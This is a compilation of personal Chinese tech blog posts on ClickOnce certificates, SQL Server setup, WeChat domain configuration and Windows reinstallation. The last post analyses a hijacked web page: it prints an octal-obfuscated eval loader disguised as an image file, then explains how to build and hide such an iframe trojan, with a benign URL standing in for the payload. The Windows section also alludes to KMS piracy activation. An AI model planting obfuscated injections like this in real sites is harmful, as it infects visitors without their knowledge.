博客 (62)

最理想的部署方式是 ClickOnce，但是证书问题会导致安装时提示：

Windows 已保护你的电脑

Windows SmartScreen 筛选器已阻止启动一个未识别的应用。运行此应用可能会导致你的电脑存在安全风险。

这需要一个从 CA 获取的数字证书（http://www.doc88.com/p-785388554071.html）

百科：                                 http://baike.baidu.com/view/1390498.htm

ClickOnce 部署教程：            http://www.cnblogs.com/weixing/p/3358740.html

Makecert.exe（证书创建工具）： https://msdn.microsoft.com/zh-cn/library/bfsktky3.aspx

如何：为 ClickOnce 应用程序向客户端计算机添加一个受信任的发行者：https://msdn.microsoft.com/zh-cn/library/ms172241.aspx

执行命令：makecert -r -n "CN=嗨秒网" -sv himiao.pvk himiao.cer

Password: LRQelk0l****************FTtJvufI

-r                创建自我签名证书。

-n  name         指定主题的证书名称。 此名称必须符合 X.500 标准。 最简单的方法是在双引号中指定此名称，并加上前缀 CN=；例如，-n "CN=myName"。

-sv  pvkFile     指定主题的 .pvk 私钥文件。 如果该文件不存在，系统将创建一个。

执行命令：Cert2spc himiao.cer himiao.spc

执行命令：pvk2pfx -pvk himiao.pvk -spc himiao.spc -pfx himiao.pfx -pi LRQelk0l****************FTtJvufI –po LRQelk0l****************FTtJvufI –f

《SQL Server 2012 数据库服务搭建流程》

安装 .net 3.5 并重启！

知识一、安装，选 64 位版本，安装功能：
    实例：数据库引擎服务及子项全选，其它暂时用不到
    共享：管理工具-完整
知识NN、若实例安装到其它磁盘，确保目录有“NETWORK SERVICE”权限！！！
知识二、卸载，参：http://technet.microsoft.com/zh-cn/library/hh231731.aspx
    必须严格按照说明卸载，否则会出现卸载不干净，重装装不上的问题。
    若不幸遇上 0x851A001A，参：http://social.msdn.microsoft.com/Forums/zh-CN/8f4d5cf8-4ab8-4a37-81df-7c294f994515/sql-server-2012-install-error-851a001a
    用户名好像是：NT Service\MSSQLSERVER
知识三、18456错误：
    服务器身份验证：SQL Server 和 Windows 身份验证模式
    具体设置在：SSMS - Windows 身份验证模式 登录后 - 对象资源管理器 - 选中当前服务器 - 右键属性 - 安全性
    SQL Server 配置管理器 - SQL Server 服务 - 重启
知识四、修改端口：
    SQL Server 配置管理器 - SQL Server 网络配置 - 相应实例的协议 - TCP/IP - IP 地址 - 将所有1433改掉
    SQL Server 配置管理器 - SQL Server 服务 - 重启
知识五、sa - 登录 - 禁用
知识六、维护计划：
    开启 SQL Server 代理，并在服务里设置自动(延时)
    SSMS - 当前服务器 - 管理 - 维护计划 - 右键 维护计划向导 每天4:03:02
    工具箱-拖入：收缩数据库-重新组织索引-重新生成索引-更新统计信息-清除历史记录-备份数据库（完整）-“清除维护”任务

    编辑每项任务，在“所有用户数据库”中勾选“忽略未处理联机状态的数据库”，这是关键，如果不勾选，一旦某个数据库被设置为脱机，备份就会出错。

    在新建的维护计划上右键，执行，完成以后，右键“查看历史记录”，如有错误作相应修改
    完整备份+差异备份方式：http://www.cnblogs.com/zhangq723/archive/2012/03/13/2394102.html 从“下面我来讲一下”开始做

需要开放远程连接的，在防火墙设置允许通过的程序，如：
D:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe

创建或还原数据库

一、（还原时）改：
    常规 - 目标 - 数据库(B)
    文件 - 表格“还原为”列 - 改文件名如：dbTest.mdf / dbTest_log.ldf
二、（还原时）dbTest - 安全性 -  用户 - 删除原用户，默认那些用户不要删
三、（还原后）属性 - 文件 - 数据库文件 - 逻辑名称，初始大小全是0
    如不需要日志，则：属性 - 选项 - 恢复模式 - 简单
四、安全性 - 登录名 - 新建登录名：
    常规 - 填写登录名 - SQL Server 身份验证 - 取消“强制实施密码策略” - 默认数据库
    用户映射 - 映射对应数据库 - 勾：db_owner / public （若只读则勾：db_datareader / public）
    用户映射确定后再检查一次，第一次有可能未设置成功

• 公众号绑定到微信开放平台要求：绑定的公众帐号必须已获得资质认证，并且开启了安全保护
• 微信开放平台帐号下的应用，要获得微信登录、智能接口、公众号第三方平台开发等高级能力，必须申请微信开放平台开发者资质认证

在开发微信中的网页时，会遇到一些域名相关的配置：

① 公众号设置 - 功能设置 - 业务域名
② 公众号设置 - 功能设置 - JS接口安全域名
③ 接口权限 - 网页授权获取用户基本信息
④ 商户平台 - 产品中心 - 开发配置 - JSAPI支付授权目录
⑤ 小程序 - 开发 - 开发设置 - 业务域名
⑥ 公众号开发 - 基本设置 - IP白名单

第①种 业务域名：相对不重要，只是用来禁止显示“防欺诈盗号,请勿支付或输入qq密码”提示框，可配置 3 个二级或二级以上域名（个人理解是“非顶级域名”，即填写了 b.a.com 的话，对 c.b.a.com 不起作用，待测）。

我们网站的域名和公众号是没有绑定关系的，那么你在打开一个（可能是朋友分享的）网页时，跟哪个公众号的配置去关联呢，答案是 JS-SDK。

测试结果：由于一个月只有3次修改机会，这次先测二级域名，有效；再测顶级域名，有效；删除所有，仍有效。所以应该是缓存作用。过几天再试，然后下个月先测顶级域名，来确定直接填写顶级域名是否对所有二级域名有效。

第②种 JS接口安全域名：是配置所配置的域名下的网页可调用 JS-SDK。可配置 5 个一级或一级以上域名（个人理解是“任何级域名”，即填写了 b.a.com 对 c.b.a.com 也有效，但对 c.z.a.com 无效，待测。如果我们拥有顶级域名对应网站的控制权（上传验证文件到网站根目录），直接填写顶级域名即可）。
使用 JS-SDK 的每个网页都必须注入配置信息（wx.config），而之前必须获取 jsapi_ticket，jsapi_ticket api 的调用次数非常有限，必须全局缓存。而获取 jsapi_ticket 之前必须先获取 access_token，同样需要全局缓存。所以，我们专门做个接口，功能是传入需要使用 JS-SDK 的网页的 url，输出 wx.config 需要用到的配置信息，来实现在不同网页（网站）使用 JS-SDK。

第③种 网页授权域名：这是已认证的服务号才能享有的特权，主要作用是获取用户在该服务号中的 openid 和 unionid。可配置 1 个 2 个回调域名（可填写任意级别的域名，但仅对该域名的网页（网站）有效，若填写了 a.com 对 b.a.com 是无效的）。

因此，如果我们需要在不同二级域名甚至不同顶级域名下的网页（以下称之为活动页面）实现用户授权，需要做一个统一的代理授权页面（回调域名当然是填写这个页面所在的域名），引导用户依次打开：微信授权页面 - 代理授权页面 - 活动页面，根据开发说明文档，具体实现如下：

当用户第一次打开活动页面时，引导打开微信授权页面（https://open.weixin.qq.com/connect/oauth2/authorize），其中参数 redirect_uri 指定回调地址，即代理授权页面地址，参数 state 指定活动页面地址。微信授权页面返回 code 和 state，code 作为换取网页授权 access_token 的票据。到这一步，本来可以由代理授权页面直接拿这个 code 去换取 access_token、openid 和 unionid 了，但是由于当前用户还在 302 重定向过程中，将这些信息带入到活动页面时势必导致信息泄露，所以这里将 code 追加到 state 指定的网址上后重定向到活动页面，活动页面拿到 code 再通过服务器端向代理授权页面所在服务器请求 openid 和 unionid，并将它们保存于 Session 中视为用户登录。这样，服务号的 appid 和 secret 也能得到保护。代理授权页面请求的微信服务器接口地址是 https://api.weixin.qq.com/sns/oauth2/access_token。

注：网页授权 access_token 不同于 JS-SDK 中使用的全局唯一接口调用凭据 access_token，没有请求次数限制。 

流程既然通了，实现逻辑可以这样设定：

活动页面首先判断 Session 中是否有 openid 或 unionid，若有表示已授权登录；没有再判断地址栏是否有 code 参数，若有则调用代理授权页面所在服务器的接口，用 code 换 openid 和 unionid；没有则直接重定向到代理授权页面，带上 state。用 code 换 openid 和 unionid 时若成功则保存至 Session，若失败则仍然重定向到代理授权页面，带上 state，特别注意 state 中的活动页面地址确保没有 code 参数。

第④种 JSAPI支付授权目录：涉及到微信支付时用到，顾名思义是固定某一个网站内的某个目录，以“/”结尾。最多可添加 5 个。如果支付页面在目录 https://www.a.com/b/ 下，那么可以填写 https://www.a.com/b/ 或 https://www.a.com/（建议后者），暂未测试填写 https://a.com/ 会不会起作用。涉及支付安全，建议设置支付页面的最深一层不可写的目录，以防目录内被上传后门文件带来的安全隐患。

第⑤种 小程序业务域名：任何需要在小程序的 web-view 组件中打开的网页，都必须配置小程序业务域名，限制 20 个。该域名要求必须 https，可填入“任何级域名”（建议填顶级域名，即填写了 a.com 对 b.a.com 也有效。如果我们拥有顶级域名对应网站的控制权（上传验证文件到网站根目录），直接填写顶级域名即可）。

第⑥种 IP白名单：仅填写管理全局 access_token 的中控服务器的 IP。

总结：在上述自定义接口部署完成后，如果微信中的网页想获取用户的 unionid，则不需要配置域名，直接使用统一的代理授权即可；如果需要使用 JS-SDK 功能，如分享、上传等等，则需要配置 JS 接口安全域名；如果有表单，最好配置一下业务域名。

本文系个人经验总结，部分结果未经证实，欢迎指正！QQ：940534113

微信是一个生活方式，朋友圈是用户分享和关注朋友们生活点滴的空间，微信公众平台是一个企业、机构与个人用户之间交流和服务的平台。一直以来，微信致力于为用户提供绿色、健康的网络生态环境。通过《微信公众平台服务协议》、《微信公众平台运营规范》和《微信开放平台开发者服务协议》等相关协议及专项规则，微信公众平台和微信开放平台的内容得到了良好的管理。为了进一步优化微信用户的使用体验，更好地保障微信用户合法权益，现将非由微信公众平台产生（即域名地址不归属于微信公众平台）且在微信内传播的外部链接内容相关管理规范进行公示。

对于违反本规范的内容，一经发现将立即进行处理，包括但不限于停止链接内容在朋友圈继续传播、停止对相关域名或IP地址进行访问、屏蔽相关链接等。由微信公众平台或开放平台帐号施行或者发起的，一经查实，前述帐号、主体也将按照微信相关规则进行处罚，包括但不限于限制或禁止使用部分或全部功能、帐号封禁直至注销等，并公告处理结果；微信也有权依照本规范及相关协议、专项规则的规定，拒绝再向前述主体提供服务。

具体规则及相关处罚如下：

1. 诱导分享类内容

   1. 1.1 要求用户分享，分享后方可进行下一步操作，分享后方可知道答案等；

   2. 1.2 含有明示或暗示用户分享的文案、图片、按钮、弹层、弹窗等的，如：分享给好友、邀请好友一起完成任务等；

   3. 1.3 通过利益诱惑，诱导用户分享、传播外链内容或者微信公众帐号文章的，包括但不限于：现金奖励、实物奖品、虚拟奖品（红包、优惠券、代金券、积分、话费、流量、信息等）、集赞、拼团、分享可增加抽奖机会、中奖概率，以积分或金钱利益诱导用户分享、点击、点赞微信公众帐号文章等；

   4. 1.4 用夸张言语来胁迫、引诱用户分享的。包括但不限于：“不转不是中国人”、“请好心人转发一下”、“转发后一生平安”、“转疯了”、“必转”、“转到你的朋友圈朋友都会感激你”等；

      

      

      若内容中包含以上情况，一经发现，立即停止链接内容在朋友圈继续传播、停止对相关域名或IP地址进行的访问，短期封禁相关开放平台帐号或应用的分享接口；对于情节恶劣的情况，永久封禁帐号、域名、IP地址或分享接口。 

2. 诱导关注类内容

   1. 强制或诱导用户关注公众帐号的，包括但不限于关注后查看答案、领取红包、关注后方可参与活动等；

      

      若内容中包含以上情况，一经发现，立即停止链接内容在朋友圈继续传播、停止对相关域名或IP地址进行的访问；对于情节恶劣的情况，永久封禁帐号、域名、IP地址。 

3. H5游戏、测试类内容

   1. 以游戏、测试等方式，吸引用户参与互动的，具体形式包括但不限于比手速、好友问答、性格测试，测试签、网页小游戏等；

      

      

      若内容中包含以上情况，一经发现，立即停止链接内容在朋友圈继续传播、停止对相关域名或IP地址进行的访问；对于情节恶劣的情况，永久封禁帐号、域名、IP地址。 

4. 欺诈类内容

   1. 4.1 虚假红包、活动

      通过虚假的红包、活动等形式，以赚取现金、实物奖品、虚拟奖品等方式欺骗用户参与的，具体形式包括但不限于虚假现金红包、虚假话费卡、虚假流量红包、虚假优惠券、虚假优惠活动等； 

   2. 4.2 宣传或销售侵害他人合法权益的商品

      通过虚假宣传、恶意营销等方式，向用户宣传或诱骗用户购买侵害他人合法权益的物品的，例如以骗取邮费为目的的赠送物品活动、虚假付费服务等； 

   3. 4.3 仿冒微信公众帐号排版、域名

      仿冒微信公众帐号文章排版、域名，可能造成微信用户混淆的；

      

      若内容中包含以上情况，一经发现，立即永久封禁帐号、域名、IP地址。 

5. 谣言类内容

   1. 发送不实信息，制造谣言，可能对他人、企业或其他机构造成损害的，例如自来水有毒、香蕉致癌、小龙虾不能吃等；

      

      若内容中包含以上情况，一经发现，立即停止链接内容在朋友圈继续传播、停止对相关域名或IP地址进行的访问、短期封禁相关开放平台帐号或应用的分享接口；对于情节恶劣的情况，永久封禁帐号、域名、IP地址； 

6. 骚扰信息、广告信息及垃圾信息

   1. 传播骚扰、欺诈、垃圾广告等信息的，包括但不限于虚假中奖类信息，不符合国家相关法律法规的保健品、药品、食品类信息，假冒伪劣商品信息，虚假服务信息，虚假网络货币等；

   2. 若内容中包含以上情况，一经发现，立即停止链接内容在朋友圈继续传播、停止对相关域名或IP地址进行的访问；对于情节恶劣的情况，永久封禁帐号、域名、IP地址。 

7. 题文不符、内容低俗的信息

   1. 7.1 题文不符的信息

      故意拟制耸动标题，或以明显倾向性、误导性、煽动性的标题吸引他人点击的，即俗称“标题党”； 

   2. 7.2 内容低俗的信息

      涉及性器官、性行为、性暗示的，传播低级趣味、庸俗、有伤风化内容的，或者宣扬暴力、恶意谩骂、侮辱他人内容的，例如：传播走光、偷拍、露点、一夜情、换妻、性虐待、情色动漫、非法性药品广告和性病治疗广告、推介淫秽色情网站等；

      

      若内容中包含以上情况，一经发现，立即停止链接内容在朋友圈继续传播、停止对相关域名或IP地址进行的访问；对于情节恶劣的情况，永久封禁帐号、域名、IP地址。 

8. 非法获取用户数据、信息

   1. 未经用户明确同意，并向用户如实披露数据用途、使用范围等相关信息的情形下复制、存储、使用或传输用户数据的，包括但不限于要求用户共享个人信息（手机号、出生日期等）才可使用其功能，或收集用户密码或者用户个人信息（包括但不限于，手机号，身份证号，生日，住址等）；

   2. 若内容中包含以上情况，一经发现，立即停止链接内容在朋友圈继续传播、停止对相关域名或IP地址进行的访问，短期封禁相关帐号；对于情节恶劣的情况，永久封禁帐号、域名、IP地址。

9. 其它违反国家法律法规的内容，包括但不限于：

   1. (1) 违反宪法确定的基本原则的；

   2. (2) 危害国家安全，泄露国家秘密，颠覆国家政权，破坏国家统一的；

   3. (3) 损害国家荣誉和利益的；

   4. (4) 煽动民族仇恨、民族歧视，破坏民族团结的；

   5. (5) 破坏国家宗教政策，宣扬邪教和封建迷信的；

   6. (6) 散布谣言，扰乱社会秩序，破坏社会稳定的；

   7. (7) 散布淫秽、色情、赌博、暴力、恐怖或者教唆犯罪的；

   8. (8) 侮辱或者诽谤他人，侵害他人合法权益的；

   9. (9) 煽动非法集会、结社、游行、示威、聚众扰乱社会秩序；

   10. (10) 以非法民间组织名义活动的；

   11. (11) 含有法律、行政法规禁止的其他内容的。

   12.  

       若内容中包含以上情况，一经发现，立即停止链接内容在朋友圈继续传播、停止对相关域名或IP地址进行的访问，短期封禁相关帐号；对于情节恶劣的情况，永久封禁帐号、域名、IP地址。

申诉及常见问题可查看：http://kf.qq.com/faq/131117ne2MV7141117JzI32q.html

微信团队请用户主动遵守上述条款，也欢迎用户对违反微信链接类内容管理规范的内容进行投诉，一经核实，微信团队将立即按照规范进行处理。让我们共同创建并维护和谐的微信生态！

微信团队

在 ASP.NET 网站开发过程中，若提交的表单中包含有 HTML 代码，为了安全，.NET 会自动阻止提交，并抛出异常：

从客户端(......)中检测到有潜在危险的 Request.Form 值。

以前的做法是

WebFrom：在 <%@ Page %> 中加入 ValidateRequest="false"

MVC：给 Action 加上属性 [ValidateInput(false)]

显然这会给网站带来极大的风险，不推荐！

以下做法可以完美解决这个问题。

客户端把内容进行 HTML 编码，如：

content = $("<div />").text(content).html();

服务端把内容进行 HTML 解码，如：

string title = HttpUtility.HtmlDecode(Request.Form["content"]);

这里仅记录我个人的安装过程，仅供参考。

安装前的准备

• 手动备份：数据库、浏览器收藏夹、FTP 站点、Navicat 连接、远程桌面、RaiDrive（点登录）、RSS源、虚拟机镜像、“下载”目录、“桌面”目录、开机启动程序、iPhone 备份（C:\Users\[用户名]\Apple\MobileSync\Backup）、浏览器插件、自动备份中的差异化文件。

• 推荐的 Edge 扩展（登录账号会自动同步）：Charset、Feedbro、IP Address and Domain Information、Kimi 浏览器助手、JSONView、Pretty Js、User-Agent Switcher and Manager、Wappalyzer、凌风云网盘助手、图片助手(ImageAssistant) 批量图片下载器、猫抓、网页更新提醒

• 桌面图标和开始菜单截图。桌面如果是手动排序图标的，先按分类归入文件夹，以方便系统恢复后按分类摆放。

• 备份：桌面、Chrome 用户目录、聊天记录、快捷回复、项目、hosts 文件。

  像 QQ、TIM、微信、旺旺、千牛 等即时聊天工具，最好将数据文件目录拷贝一份（包含图片视频等），再打开软件登录帐号进行记录备份（一般不含图片视频等）。这样，在重装系统后，如果还原拷贝的聊天文件不能供聊天软件使用，可以用备份数据恢复。

• 备份剪映目录，否则重装后需要重新下载素材/字体等，位置：C:\用户\AppData\Local\JianyingPro\User Data\

• 备份到移动硬盘或 NAS

• 排查以上未提及的新软件或新设置是否有需要处理或备份的。

• 清空回收站

• 确定系统盘所在硬盘和分区和大小，避免在格式化时选错硬盘分区。

• 外星人电脑开机按 F2 进入 BIOS，F12 选择启动设备。

设置

• 这台电脑（右键）- 属性 - 高级系统设置 - 高级 - 性能设置 - 高级 - 更改 - 去掉“自动管理所有驱动器的分布文件大小”前的勾，选择 SSD 分区的分布文件为系统管理的大小，点设置，其它分区无分布文件，点设置 - 确定

• 以上是在 SSD 空间足够的情况下，如果不足，那么可以分配到其它分区。

• Windows 更新、并在高级选项中开启（更新 Windows 时接收其它 Microsoft 产品的更新）
  

安装驱动

• 目前的 Windows Update 已经可以安装大部分驱动了，如果设备管理器中还有警示图标，或者有些硬件功能不能启用，那么可以前往对应品牌的官网下载，如联想驱动安装工具、戴尔驱动程序，其它可使用驱动精灵。

安装 Office

• 安装 Office 批量授权版

• 立即安装即可，不要更改路径。

恢复数据

• Chrome 目录（C:\Users\[用户名]\AppData\Local\Google\Chrome\User Data\Default\）

• QQ 记录（默认路径：C:\Users\[用户名]\Documents\Tencent Files）

• 微信记录（默认路径：C:\Users\[用户名]\Documents\WeChat Files），微信记录可能会不能使用

• 视情况删除非系统盘的 \Program Files、\Program Files (x86)、\Users\xoyozo\AppData 等

应用程序

• 安装 Edge。

• 先安装 SQL Server，再安装 Visual Studio（如欲同时安装低版本 VS，先安装低版本，再安装高版本）

• 安装 Adobe

• 安装其它软件

• 替换 hosts，若出现安全软件警告，信任即可。
  

激活 Windows、Office、Adobe 等：

• 嗯

细节

• Win10 任务栏单击“文件资源管理器”打开“此电脑”的设置方法：打开任意文件资源管理器窗口，菜单 - 查看 - 选项，将“打开文件资源管理器时打开”改为“此电脑”

• Win10 任务栏日期显示星期：控制面板 - 更改日期、时间和数字格式 - 其他设置 - 日期，将短日期改为：yyyy/M/d ddd
  

• 如何在 Windows 11 任务栏时间上显示“秒”

• 随系统启动程序的目录（所有用户）：C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

• 随系统启动程序的目录（单个用户）：C:\用户\[用户名]\AppData\Roaming\Microsoft\Windows\「开始」菜单\程序\启动，（即：C:\Users\[用户名]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup）

• 自带的微软五笔已经提供五笔拼音混打了，所以抛弃QQ五笔了
  

• Win10系统怎样让打开图片方式为照片查看器

• 设置 Navicat 自动运行。

• 设置电源相关

• SQL Server 按需设置启动/禁用：SQL Server 配置管理器 - SQL Server 服务 - 右侧双击选择实例 - 切换到“服务”选项卡 - 启动模式

版本区别

下载地址

根据下面的 SHA1 或文件名在网上搜索下载地址，下载完成后验证其 SHA1 即可。

Windows 8 (x86) - DVD (Chinese-Simplified)
文件名： cn_windows_8_x86_dvd_915414.iso
SHA1: 0C4A168E37E38EFB59E8844353B2535017CBC587


Windows 8 (x64) - DVD (Chinese-Simplified)
文件名： cn_windows_8_x64_dvd_915407.iso
SHA1: A87C4AA85D55CD83BAE9160560D1CB3319DD675C


Windows 8 Pro VL (x86) - DVD (Chinese-Simplified)
文件名： cn_windows_8_pro_vl_x86_dvd_917720.iso
SHA1: EEEF3C3F6F05115C7F7C9C1D19D6A6A6418B5059


Windows 8 Pro VL (x64) - DVD (Chinese-Simplified) 推荐
文件名： cn_windows_8_pro_vl_x64_dvd_917773.iso
SHA1: 9C4EC9FC4FB561F841E22256BC9DEA6D9D6611FF


Windows 8 Enterprise (x86) - DVD (Chinese-Simplified)
文件名： cn_windows_8_enterprise_x86_dvd_917682.iso
SHA1: 951565D8579C5912FB4A407B3B9F715FBDB77EFE


Windows 8 Enterprise (x64) - DVD (Chinese-Simplified)
文件名： cn_windows_8_enterprise_x64_dvd_917570.iso
SHA1: 1280BC3A38A7001FDE981FA2E465DEB341478667

激活方式

目前流行 KMSmicro 激活，写此文时的最新版本是 4.0，下载地址网上搜之（或联系我）。

今天访问某 asp 网站时发现不对劲，一看源文件原来网页被挂马了，仔细查看源代码发现：

<script>document.write("<scri");</script>pt src="images/banner.jpg"></script>

这段代码调用了 banner.jpg 这个 js 文件。用记事本打开这个文件发现以下内容：（木马内容已替换成安全内容）

eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\170\157\171\157\172\157\56\155\145\76\74\57\151\146\162\141\155\145\76\47\51")

代码非常整齐，立刻怀疑是 ascii 码的八进制代码。于是解码之，就看到了：（木马内容已替换成安全内容）

document.write('<iframe src=https://xoyozo.net></iframe>')

至此，整个流程已非常清晰了。

八进制转化为十进制

var a = '144';
alert(parseInt(a, 8));  // 输出为 100

十进制转化为八进制

var a = 100;
alert(a.toString(8)); // 输出为 144

ASCII 码转化为字符

var a = 100;
alert(String.fromCharCode(a));  // 输出为 d

字符转化为 ASCII 码

var a = "d";
alert(a.charCodeAt(a));  // 输出为 100

如果用 alert 直接输出编码后的代码，看到的却是原码，下面提供HTML编码和解码：

function HTMLEncode(input) {
  var converter = document.createElement("DIV");
  converter.innerText = input;
  var output = converter.innerHTML;
  converter = null;
  return output;
}

function HTMLDecode(input) {
  var converter = document.createElement("DIV");
  converter.innerHTML = input;
  var output = converter.innerText;
  converter = null;
  return output;
}

您可以比较一下区别：

var a = "document.write('<iframe src=https://xoyozo.net></iframe>')";
document.write(a);

var a = "document.write('<iframe src=https://xoyozo.net></iframe>')";
document.write(HTMLEncode(a));

现在完全可以实现宿主页面执行嵌套 iframe 的效果了。如果需要更隐蔽，可以给 <iframe/> 加上尺寸属性。下面一起来制作一个简单的木马：把

document.write('<iframe src=https://xoyozo.net></iframe>')

编码为

\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\170\157\171\157\172\157\56\155\145\76\74\57\151\146\162\141\155\145\76\47\51

的代码为

var a = "document.write('<iframe src=https://xoyozo.net></iframe>')";
var b = "";
for (var i = 0; i < a.length; i++) {
  b += "\\" + a.charCodeAt(i).toString(8);
}
document.write(HTMLEncode(b));

然后加上 eval() 方法，保存为 .jpg 文件，再通过文章开始介绍的方法调用就行了。

症状：因为安全原因，文件不可浏览。请联系系统管理员并检查CKFinder配置文件。

解决：搜索方法： CheckAuthentication()  仔细看注释部分即可解决问题。